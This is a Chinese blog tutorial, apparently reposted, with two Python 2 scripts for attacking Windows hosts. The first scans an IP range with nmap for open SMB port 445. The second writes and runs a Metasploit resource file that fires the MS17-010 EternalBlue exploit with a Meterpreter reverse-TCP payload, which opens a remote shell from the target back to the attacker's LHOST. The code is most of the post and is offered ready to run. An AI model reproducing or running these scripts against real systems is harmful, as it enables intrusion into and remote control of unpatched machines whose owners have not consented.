python調用metasploit里的MS-17-010模塊進行漏洞攻擊


起因:看各位大佬們寫的shellcode厲害的一匹,可惜自己沒學C和匯編

也看不懂shellcode,只能寫一個調用metasploit里的模塊進行攻擊了。

0x01

攻擊機:192.168.223.141 kali Linux
目標:192.168.3.5 windows

  需要用到的模塊(這里我們寫兩個腳本,一個用於掃描IP段,看看那個IP開了445)

nmap模塊
os模塊
sys模塊

nmap模塊kail自帶坑的要死,完全沒有相關的函數。
手動卸載:pip uninstall nmap
安裝:pip insall nmap

  0x02

代碼分析

sm445.py

nmap模塊詳解:https://pypi.python.org/pypi/python-nmap/0.6.1

import nmap
import sys
print '[+]nmap scanning...'
def portscanner(sbg):
  nmscn=nmap.PortScanner()#實例化nmap.PortScanner對象
  nmscn.scan(sbg,'445')#scan('目標IP','端口')
  for host in nmscn.all_hosts():#獲取掃描到的所有主機
      if nmscn[host].has_tcp(445):#判斷主機上是否有445端口,
          state=nmscn[host]['tcp'][445]['state']#端口445 / TCP在主機打開
          if state=="open":#如果端口開放
              print '[*]The open 445 ip in:'+host#輸出開放端口的IP
portscanner(sys.argv[1])

  

 

yhzl.py

 

import sys
import os
print 'Metasploit executing the ms-17-010 vulnerability attack'#這句話的意思是正在實施MS17010漏洞的攻擊
def sds(config):
    config=open('yhzl.rc','w')#首先我們來創建一個xxx.rc的文件
   #把你要使用到的模塊和對應的參數寫入xxx.rc里去
    config.write('use exploit/windows/smb/ms17_010_eternalblue'+"\n")
    config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"\n")
    config.write('set RHOST '+sys.argv[1]+"\n")
    config.write('set LHOST '+sys.argv[2]+"\n")
    config.write('exploit'+"\n")
sds('')
def main():
    mg=os.system('msfconsole -r /root/yhzl.rc')#執行msfconsole -r 路徑/xxx.rc,就可以了
if __name__ == '__main__':
    main()

  運行截圖這里就不放了,我怕電腦藍屏。視頻發到群里了,看攻擊過程的小伙伴 

       可以進群看聊天記錄。還有歡迎大家進入即刻安全技術交流群:307283889

       推薦大家看基本python的書:

     《python絕技 運用python成為頂級黑客》 python2x 版本

        《python 黑帽子》 python 3x版本

    看完實戰,或者構造一個思路去實現他。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM